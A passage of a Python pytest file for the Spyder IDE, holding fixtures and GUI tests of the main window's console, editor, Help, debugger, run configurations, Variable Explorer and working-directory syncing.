    Plugins written against the new API expose ``get_name()``; older
    ones expose ``get_plugin_title()`` instead.
    """
    for candidate in main_window.thirdparty_plugins:
        try:
            # New API
            title = candidate.get_name()
        except AttributeError:
            # Old API
            title = candidate.get_plugin_title()
        if title == plugin_title:
            return candidate
def reset_run_code(qtbot, shell, code_editor, nsb):
    """Reset state after a run code test.

    Waits for any in-flight execution, clears the kernel namespace,
    waits until the Variable Explorer (``nsb``) is empty, then puts the
    cursor back at the top of the editor.
    """
    qtbot.waitUntil(lambda: not shell._executing)
    with qtbot.waitSignal(shell.executed):
        shell.execute('%reset -f')
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
    code_editor.setFocus()
    # Ctrl+Home -> move cursor to the beginning of the file.
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
                     **kwargs):
    """Start a new kernel, and return its Manager and Client.

    If ``spykernel`` is True the manager is forced to use a Spyder
    kernel spec; extra ``kwargs`` go to ``KernelManager.start_kernel``.
    On startup failure the kernel is shut down before re-raising.
    """
    km = KernelManager(kernel_name=kernel_name)
    if spykernel:
        km._kernel_spec = SpyderKernelSpec()
    km.start_kernel(**kwargs)
    kc = km.client()
    kc.start_channels()
    try:
        kc.wait_for_ready(timeout=startup_timeout)
    except RuntimeError:
        # Don't leak a half-started kernel process.
        kc.stop_channels()
        km.shutdown_kernel()
        raise
    return km, kc
def find_desired_tab_in_window(tab_name, window):
    """Return ``(tabbar, index)`` of the tab labelled *tab_name*.

    Searches every ``QTabBar`` in *window*; returns ``(None, None)``
    when no tab matches.
    """
    wanted = str(tab_name)
    for bar in window.findChildren(QTabBar):
        for idx in range(bar.count()):
            if bar.tabText(idx) == wanted:
                return bar, idx
    return None, None
def register_fake_entrypoints():
    """
    Create an entry points distribution to register elements:

    * Completion providers (Fallback, Snippets, LSP)
    * Plugins (SpyderBoilerplate plugin)
    """
    # Completion providers
    fallback = pkg_resources.EntryPoint.parse(
        'fallback = spyder.plugins.completion.providers.fallback.provider:'
        'FallbackProvider'
    )
    snippets = pkg_resources.EntryPoint.parse(
        'snippets = spyder.plugins.completion.providers.snippets.provider:'
        'SnippetsProvider'
    )
    lsp = pkg_resources.EntryPoint.parse(
        'lsp = spyder.plugins.completion.providers.languageserver.provider:'
        'LanguageServerProvider'
    )

    # Extra plugins
    spyder_boilerplate = pkg_resources.EntryPoint.parse(
        'spyder_boilerplate = spyder.app.tests.spyder_boilerplate.spyder.'
        'plugin:SpyderBoilerplate'
    )

    # Create a fake Spyder distribution
    d = pkg_resources.Distribution(__file__)

    # Add the providers and plugins to the fake EntryPoints
    d._ep_map = {
        'spyder.completions': {
            'fallback': fallback,
            'snippets': snippets,
            'lsp': lsp
        },
        'spyder.plugins': {
            'spyder_boilerplate': spyder_boilerplate
        }
    }

    # Add the fake distribution to the global working_set
    pkg_resources.working_set.add(d, 'spyder')
def remove_fake_entrypoints():
    """Remove fake entry points from pkg_resources.

    Each removal is attempted independently so one missing key does not
    skip the remaining cleanup (the original single try block stopped at
    the first ``KeyError``, and ``list.remove`` raises ``ValueError`` --
    not ``KeyError`` -- which previously escaped uncaught).
    """
    working_set = pkg_resources.working_set
    for mapping, key in (
        (working_set.by_key, 'unknown'),
        (working_set.entry_keys, 'spyder'),
        (working_set.entry_keys, __file__),
    ):
        try:
            mapping.pop(key)
        except KeyError:
            pass
    try:
        working_set.entries.remove('spyder')
    except ValueError:
        # Entry was never added or was already removed.
        pass
# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request, tmpdir):
    """Main Window fixture.

    Creates (or reuses) a single Spyder main window for the whole test
    session.  The window instance is cached on this fixture function
    itself (``main_window.window``) so later tests reuse it instead of
    starting Spyder again; the session-scoped ``cleanup`` fixture closes
    it at the end.
    """
    register_fake_entrypoints()

    # Tests assume inline backend
    CONF.set('ipython_console', 'pylab/backend', 0)

    # Test assume the plots are rendered in the console as png
    CONF.set('plots', 'mute_inline_plotting', False)
    CONF.set('ipython_console', 'pylab/inline/figure_format', 0)

    # Set exclamation mark to True
    CONF.set('ipython_console', 'pdb_use_exclamation_mark', True)

    # Check if we need to use introspection in a given test
    # (it's faster and less memory consuming not to use it!)
    use_introspection = request.node.get_closest_marker('use_introspection')
    if use_introspection:
        os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
    else:
        try:
            os.environ.pop('SPY_TEST_USE_INTROSPECTION')
        except KeyError:
            pass

    # Only use single_instance mode for tests that require it
    single_instance = request.node.get_closest_marker('single_instance')
    if single_instance:
        CONF.set('main', 'single_instance', True)
    else:
        CONF.set('main', 'single_instance', False)

    # Check if we need to preload a project in a given test
    preload_project = request.node.get_closest_marker('preload_project')
    if preload_project:
        # Create project
        project_path = str(tmpdir.mkdir('test_project'))
        project = EmptyProject(project_path)
        CONF.set('project_explorer', 'current_project_path', project_path)

        # Add some files to project
        filenames = [
            osp.join(project_path, f) for f in
            ['file1.py', 'file2.py', 'file3.txt']
        ]
        for filename in filenames:
            with open(filename, 'w') as f:
                if osp.splitext(filename)[1] == '.py':
                    f.write("def f(x):\n"
                            "    return x\n")
                else:
                    f.write("Hello world!")
        project.set_recent_files(filenames)
    else:
        CONF.set('project_explorer', 'current_project_path', None)

    # Get config values passed in parametrize and apply them
    try:
        param = request.param
        if isinstance(param, dict) and 'spy_config' in param:
            CONF.set(*param['spy_config'])
    except AttributeError:
        # request.param is only defined for parametrized fixtures.
        pass

    if not hasattr(main_window, 'window'):
        # Start the window
        window = start.main()
        main_window.window = window
    else:
        window = main_window.window

        # Close everything we can think of
        window.editor.close_file()
        window.projects.close_project()
        if window.console.error_dialog:
            window.console.close_error_dialog()
        window.switcher.close()
        for client in window.ipyconsole.get_clients():
            window.ipyconsole.close_client(client=client, force=True)
        window.outlineexplorer.stop_symbol_services('python')
        # Reset cwd
        window.explorer.chdir(get_home_dir())
        # Remove Kite (In case it was registered via setup.py)
        window.completions.providers.pop('kite', None)

    yield window

    # Print shell content if failed
    if request.node.rep_setup.passed:
        if request.node.rep_call.failed:
            # Print content of shellwidget and close window
            print(window.ipyconsole.get_current_shellwidget(
                )._control.toPlainText())
            # Print info page content if not blank
            console = window.ipyconsole
            client = console.get_current_client()
            if client.info_page != client.blank_page:
                print('info_page')
                print(client.info_page)
            # Discard the cached window so the next test starts fresh.
            window.close()
            del main_window.window
@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
    """Cleanup a testing directory once we are finished."""
    def remove_test_dir():
        # The shared window is cached as an attribute of the
        # ``main_window`` fixture function; close it if it was created.
        if hasattr(main_window, 'window'):
            try:
                main_window.window.close()
            except AttributeError:
                pass
        remove_fake_entrypoints()

    request.addfinalizer(remove_test_dir)
# =============================================================================
# ---- Tests
# =============================================================================
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.single_instance
@pytest.mark.skipif(os.environ.get('CI', None) is None,
                    reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
    """Test single instance mode and %edit magic."""
    editorstack = main_window.editor.get_current_editorstack()
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    spy_dir = osp.dirname(get_module_path('spyder'))
    # Try to acquire Spyder's lock file from the kernel: with single
    # instance mode on, the running instance already holds it, so the
    # acquisition must fail.
    lock_code = (
        "import sys\n"
        "sys.path.append(r'{spy_dir_str}')\n"
        "from spyder.utils.external import lockfile\n"
        "lock_file = r'{lock_file}'\n"
        "lock = lockfile.FilesystemLock(lock_file)\n"
        "lock_created = lock.lock()\n"
        "print(lock_created)".format(
            spy_dir_str=spy_dir,
            lock_file=get_conf_path('spyder.lock'))
    )

    with qtbot.waitSignal(shell.executed, timeout=2000):
        shell.execute(lock_code)
    assert not shell.get_value('lock_created')

    # Test %edit magic
    n_editors = editorstack.get_stack_count()
    p = tmpdir.mkdir("foo").join("bar.py")
    p.write(lock_code)

    with qtbot.waitSignal(shell.executed):
        shell.execute('%edit {}'.format(to_text_string(p)))

    qtbot.wait(3000)
    assert editorstack.get_stack_count() == n_editors + 1
    assert editorstack.get_current_editor().toPlainText() == lock_code

    main_window.editor.close_file()
@pytest.mark.slow
def test_lock_action(main_window):
    """Test the lock interface action."""
    action = main_window.layouts.lock_interface_action
    plugins = main_window.widgetlist

    # By default the interface is locked.
    assert main_window.layouts._interface_locked

    # In this state the title bar is an empty QWidget
    for plugin in plugins:
        title_bar = plugin.dockwidget.titleBarWidget()
        assert not isinstance(title_bar, DockTitleBar)
        assert isinstance(title_bar, QWidget)

    # Test that our custom title bar is shown when the action
    # is triggered.
    action.trigger()
    for plugin in plugins:
        title_bar = plugin.dockwidget.titleBarWidget()
        assert isinstance(title_bar, DockTitleBar)
    assert not main_window.layouts._interface_locked

    # Restore default state
    action.trigger()
    assert main_window.layouts._interface_locked
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.skipif(os.name == 'nt' and PY2, reason="Fails on win and py2")
def test_default_plugin_actions(main_window, qtbot):
    """Test the effect of dock, undock, close and toggle view actions."""
    # Use a particular plugin
    file_explorer = main_window.explorer
    main_widget = file_explorer.get_widget()

    # Undock action: the plugin moves into its own top-level window.
    main_widget.undock_action.triggered.emit(True)
    qtbot.wait(500)
    assert not file_explorer.dockwidget.isVisible()
    assert main_widget.undock_action is not None
    assert isinstance(main_widget.windowwidget, SpyderWindowWidget)
    assert main_widget.windowwidget.centralWidget() == main_widget

    # Dock action: the plugin returns to the main window.
    main_widget.dock_action.triggered.emit(True)
    qtbot.wait(500)
    assert file_explorer.dockwidget.isVisible()
    assert main_widget.windowwidget is None

    # Close action: hides the dockwidget and unchecks the toggle.
    main_widget.close_action.triggered.emit(True)
    qtbot.wait(500)
    assert not file_explorer.dockwidget.isVisible()
    assert not file_explorer.toggle_view_action.isChecked()

    # Toggle view action
    file_explorer.toggle_view_action.setChecked(True)
    assert file_explorer.dockwidget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True)
def test_opengl_implementation(main_window, qtbot):
    """
    Test that we are setting the selected OpenGL implementation
    """
    # The parametrized config above asks for the 'software' backend.
    assert main_window._test_setting_opengl('software')

    # Restore default config value
    CONF.set('main', 'opengl', 'automatic')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
    reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
    """
    Test that we filter a warning shown when an array contains nan
    values and the Variable Explorer option 'Show arrays min/max'
    is on.

    For spyder-ide/spyder#7063.
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Create an array with a nan value
    with qtbot.waitSignal(shell.executed):
        shell.execute('import numpy as np; A=np.full(16, np.nan)')

    qtbot.wait(1000)

    # Assert that no warnings are shown in the console
    assert "warning" not in control.toPlainText()
    assert "Warning" not in control.toPlainText()

    # Restore default config value
    CONF.set('variable_explorer', 'minmax', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
                    reason="Times out in PY2 and fails on other than macOS")
def test_get_help_combo(main_window, qtbot):
    """
    Test that Help can display docstrings for names typed in its combobox.
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    if WEBENGINE:
        webpage = webview.page()
    else:
        webpage = webview.page().mainFrame()

    # --- From the console ---
    # Write some object in the console
    with qtbot.waitSignal(shell.executed):
        shell.execute('import numpy as np')

    # Get help - numpy
    object_combo = help_plugin.get_widget().object_combo
    object_combo.setFocus()

    qtbot.keyClicks(object_combo, 'numpy', delay=100)

    # Check that an expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)

    # Get help - numpy.arange
    qtbot.keyClicks(object_combo, '.arange', delay=100)

    # Check that an expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)

    # Get help - np
    # Clear combo
    object_combo.set_current_text('')

    qtbot.keyClicks(object_combo, 'np', delay=100)

    # Check that an expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)

    # Get help - np.arange
    qtbot.keyClicks(object_combo, '.arange', delay=100)

    # Check that an expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
    """
    Test that Help works when called from the IPython console
    with dot calls i.e np.sin

    See spyder-ide/spyder#11821
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Open test file
    test_file = osp.join(LOCATION, 'script_unicode.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # Run test file
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)

    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    webpage = webview.page() if WEBENGINE else webview.page().mainFrame()

    # Write function name
    qtbot.keyClicks(control, u'np.linalg.norm')

    # Get help
    control.inspect_current_object()

    # Check that an expected text is part of the page
    qtbot.waitUntil(
        lambda: check_text(webpage, "Matrix or vector norm."),
        timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_special_characters(
        main_window, qtbot, tmpdir):
    """
    Test that Help works when called from the IPython console
    for unusual characters.

    See spyder-ide/spyder#7699
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Open test file
    test_file = osp.join(LOCATION, 'script_unicode.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # Run test file
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)

    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    webpage = webview.page() if WEBENGINE else webview.page().mainFrame()

    # Write function name and assert in Console
    def check_control(control, value):
        return value in control.toPlainText()

    # Tab-complete to the function with a special character in its name.
    qtbot.keyClicks(control, u'aa\t')
    qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000)

    # Get help
    control.inspect_current_object()

    # Check that an expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."),
                    timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' and os.environ.get('CI') is not None,
                    reason="Times out on AppVeyor")
def test_get_help_ipython_console(main_window, qtbot):
    """Test that Help works when called from the IPython console."""
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    webpage = webview.page() if WEBENGINE else webview.page().mainFrame()

    # Write some object in the console
    qtbot.keyClicks(control, 'runfile')

    # Get help
    control.inspect_current_object()

    # Check that an expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="Does not work on Mac and Windows!")
@pytest.mark.use_introspection
@pytest.mark.parametrize(
    "object_info",
    [("range", "range"),
     ("import matplotlib.pyplot as plt",
      "The object-oriented API is recommended for more complex plots.")])
def test_get_help_editor(main_window, qtbot, object_info):
    """Test that Help works when called from the Editor."""
    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    webpage = webview.page() if WEBENGINE else webview.page().mainFrame()

    main_window.editor.new(fname="test.py", text="")
    code_editor = main_window.editor.get_focus_widget()
    editorstack = main_window.editor.get_current_editorstack()
    # Wait for the language server to acknowledge the new file.
    with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()

    # Write some object in the editor
    object_name, expected_text = object_info
    code_editor.set_text(object_name)
    code_editor.move_cursor(len(object_name))
    with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_change()

    # Get help
    with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000):
        editorstack.inspect_current_object()

    # Check that an expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000)
@pytest.mark.slow
def test_window_title(main_window, tmpdir):
    """Test window title with non-ascii characters."""
    projects = main_window.projects

    # Create a project in non-ascii path
    path = to_text_string(tmpdir.mkdir(u'測試'))
    projects.open_project(path=path)

    # Set non-ascii window title
    main_window.window_title = u'اختبار'

    # Assert window title is computed without errors
    # and has the expected strings
    main_window.set_window_title()
    title = main_window.base_title
    assert u'Spyder' in title
    assert u'Python' in title
    assert u'اختبار' in title
    assert u'測試' in title

    projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It fails sometimes")
@pytest.mark.parametrize(
    "debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
    """Test that we move to the first breakpoint if there's one present."""
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Main variables
    control = shell._control
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # Set breakpoint
    code_editor.debugger.toogle_breakpoint(line_number=10)
    qtbot.wait(500)
    cursor = code_editor.textCursor()
    cursor.setPosition(0)
    code_editor.setTextCursor(cursor)

    if debugcell:
        # Advance 2 cells
        for i in range(2):
            qtbot.keyClick(code_editor, Qt.Key_Return,
                           modifier=Qt.ShiftModifier)
            qtbot.wait(500)

        # Debug the cell (Alt+Shift+Return)
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClick(code_editor, Qt.Key_Return,
                           modifier=Qt.AltModifier | Qt.ShiftModifier)
        # Make sure everything is ready
        assert shell.spyder_kernel_comm.is_open()
        assert shell.is_waiting_pdb_input()

        with qtbot.waitSignal(shell.executed):
            shell.pdb_execute('!b')
        assert 'script.py:10' in shell._control.toPlainText()

        # We need to press continue as we don't test yet if a breakpoint
        # is in the cell
        with qtbot.waitSignal(shell.executed):
            shell.pdb_execute('!c')
    else:
        # Click the debug button
        with qtbot.waitSignal(shell.executed):
            qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Verify that we are at first breakpoint
    shell.clear_console()
    qtbot.wait(500)
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!list")
    assert "1--> 10 arr = np.array(li)" in control.toPlainText()

    # Exit debugging
    shell.pdb_execute("!exit")
    qtbot.wait(500)

    # Set breakpoint on first line with code
    code_editor.debugger.toogle_breakpoint(line_number=2)
    qtbot.wait(500)

    # Click the debug button
    qtbot.mouseClick(debug_button, Qt.LeftButton)
    qtbot.wait(1000)

    # Verify that we are still on debugging
    try:
        assert shell.is_waiting_pdb_input()
    except Exception:
        print('Shell content: ', shell._control.toPlainText(), '\n\n')
        raise

    # Remove breakpoint and close test file
    main_window.editor.clear_all_breakpoints()
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
    """Test runconfig workdir options."""
    from spyder.plugins.run.widgets import RunConfiguration
    CONF.set('run', 'configurations', [])

    # ---- Load test file ----
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # --- Use cwd for this file ---
    rc = RunConfiguration().get()
    rc['file_dir'] = False
    rc['cw_dir'] = True
    config_entry = (test_file, rc)
    CONF.set('run', 'configurations', [config_entry])

    # --- Run test file ---
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)

    # --- Assert we're in cwd after execution ---
    with qtbot.waitSignal(shell.executed):
        shell.execute('import os; current_dir = os.getcwd()')
    assert shell.get_value('current_dir') == get_home_dir()

    # --- Use fixed execution dir for test file ---
    temp_dir = str(tmpdir.mkdir("test_dir"))
    rc['file_dir'] = False
    rc['cw_dir'] = False
    rc['fixed_dir'] = True
    rc['dir'] = temp_dir
    config_entry = (test_file, rc)
    CONF.set('run', 'configurations', [config_entry])

    # --- Run test file ---
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)

    # --- Assert we're in fixed dir after execution ---
    with qtbot.waitSignal(shell.executed):
        shell.execute('import os; current_dir = os.getcwd()')
    assert shell.get_value('current_dir') == temp_dir

    # ---- Closing test file and resetting config ----
    main_window.editor.close_file()
    CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
                    reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
    """Test running code in dedicated consoles."""
    from spyder.plugins.run.widgets import RunConfiguration

    # ---- Load test file ----
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # --- Set run options for this file ---
    rc = RunConfiguration().get()
    # A dedicated console is used when these two options are False
    rc['current'] = rc['systerm'] = False
    config_entry = (test_file, rc)
    CONF.set('run', 'configurations', [config_entry])

    # --- Run test file and assert that we get a dedicated console ---
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    nsb = main_window.variableexplorer.current_widget()

    assert len(main_window.ipyconsole.get_clients()) == 2
    assert main_window.ipyconsole.filenames == ['', test_file]
    assert main_window.ipyconsole.tabwidget.tabText(1) == 'script.py/A'
    qtbot.wait(500)
    assert nsb.editor.source_model.rowCount() == 4

    # --- Assert only runfile text is present and there's no banner text ---
    # See spyder-ide/spyder#5301.
    text = control.toPlainText()
    assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)

    # --- Clean namespace after re-execution ---
    with qtbot.waitSignal(shell.executed):
        shell.execute('zz = -1')
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)
    assert not shell.is_defined('zz')

    # --- Assert runfile text is present after reruns ---
    assert 'runfile' in control.toPlainText()

    # ---- Closing test file and resetting config ----
    main_window.editor.close_file()
    CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_connection_to_external_kernel(main_window, qtbot):
    """
    Test that only Spyder kernels are connected to the Variable Explorer.

    A generic (plain IPython) external kernel must show no variables,
    while an external Spyder kernel must show them and also support
    runfile. Finally checks both kernels (and their restarters) shut
    down cleanly.
    """
    # Test with a generic (non-Spyder) kernel
    km, kc = start_new_kernel()
    main_window.ipyconsole._create_client_for_kernel(kc.connection_file, None,
                                                     None, None)
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Assert that there are no variables in the variable explorer
    main_window.variableexplorer.change_visibility(True)
    nsb = main_window.variableexplorer.current_widget()
    qtbot.wait(500)
    assert nsb.editor.source_model.rowCount() == 0

    # Keep a handle on the generic-kernel shell for the shutdown phase.
    python_shell = shell

    # Test with a kernel from Spyder
    spykm, spykc = start_new_kernel(spykernel=True)
    main_window.ipyconsole._create_client_for_kernel(spykc.connection_file, None,
                                                     None, None)
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Assert that a variable is visible in the variable explorer
    main_window.variableexplorer.change_visibility(True)
    nsb = main_window.variableexplorer.current_widget()
    qtbot.wait(500)
    assert nsb.editor.source_model.rowCount() == 1

    # Test runfile in external_kernel
    run_action = main_window.run_toolbar_actions[0]
    run_button = main_window.run_toolbar.widgetForAction(run_action)

    # Create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(
        "print(2 + 1)"
    )

    # Start running
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(run_button, Qt.LeftButton)
    assert "runfile" in shell._control.toPlainText()
    assert "3" in shell._control.toPlainText()

    # Try quitting the kernels
    shell.execute('quit()')
    python_shell.execute('quit()')
    qtbot.wait(1000)

    # Make sure everything quit properly.
    # poll() returns non-None once the subprocess has exited.
    assert km.kernel.poll() is not None
    assert spykm.kernel.poll() is not None
    if spykm._restarter:
        assert spykm._restarter.poll() is not None
    if km._restarter:
        assert km._restarter.poll() is not None

    # Close the channels
    spykc.stop_channels()
    kc.stop_channels()
@pytest.mark.order(1)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
    """Test that variable types can't be changed in the Variable Explorer."""
    # Define an int in the console so it shows up in the
    # Variable Explorer.
    shellwidget = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shellwidget._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shellwidget.executed):
        shellwidget.execute('a = 10')

    # Open the inline editor for that variable.
    main_window.variableexplorer.change_visibility(True)
    namespace_browser = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(
        lambda: namespace_browser.editor.source_model.rowCount() > 0,
        timeout=EVAL_TIMEOUT)
    namespace_browser.editor.setFocus()
    namespace_browser.editor.edit_item()

    # Attempt to replace the int value with a string.
    qtbot.keyClicks(QApplication.focusWidget(), "'s'")
    qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
    qtbot.wait(1000)

    # The type change must have been rejected: 'a' is still the int.
    assert shellwidget.get_value('a') == 10
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(
        main_window, qtbot, tmpdir, test_directory):
    """
    Test synchronization with working directory and File Explorer when
    changing cwd in the IPython console.
    """
    workingdirectory = main_window.workingdirectory
    explorer_tree = main_window.explorer.get_widget().treewidget
    shellwidget = main_window.ipyconsole.get_current_shellwidget()

    # Don't interact with the window until it's fully up.
    qtbot.waitUntil(
        lambda: shellwidget._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Directory to switch to (possibly containing non-ascii characters).
    target_dir = str(tmpdir.mkdir(test_directory))

    # Change directory from the console side using the %cd magic.
    with qtbot.waitSignal(shellwidget.executed):
        shellwidget.execute(u"%cd {}".format(target_dir))
    qtbot.wait(1000)

    # The Working directory plugin must have recorded the change ...
    assert osp.normpath(
        workingdirectory.get_container().history[-1]) == osp.normpath(
            target_dir)

    # ... and the File Explorer must have followed it as well.
    assert osp.normpath(
        explorer_tree.get_current_folder()) == osp.normpath(target_dir)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
    """
    Test synchronization with working directory and IPython console when
    changing directories in the File Explorer.
    """
    workingdirectory = main_window.workingdirectory
    file_explorer = main_window.explorer
    shellwidget = main_window.ipyconsole.get_current_shellwidget()

    # Don't interact with the window until it's fully up.
    qtbot.waitUntil(
        lambda: shellwidget._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Directory to switch to (possibly containing non-ascii characters).
    target_dir = to_text_string(tmpdir.mkdir(test_directory))

    # Change directory from the File Explorer side.
    file_explorer.chdir(target_dir)
    qtbot.wait(1000)

    # The Working directory plugin must have recorded the change ...
    assert osp.normpath(
        workingdirectory.get_container().history[-1]) == osp.normpath(
            target_dir)

    # ... and the console's cwd must have followed it as well.
    assert osp.normpath(target_dir) == osp.normpath(shellwidget._cwd)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    (os.name == 'nt' or sys.platform == 'darwin' or
     parse_version(ipy_release.version) == parse_version('7.11.0')),
    reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
    """
    Test all the different ways we have to run Cython code.

    Runs a .pyx file directly, then a .py file that imports a Cython
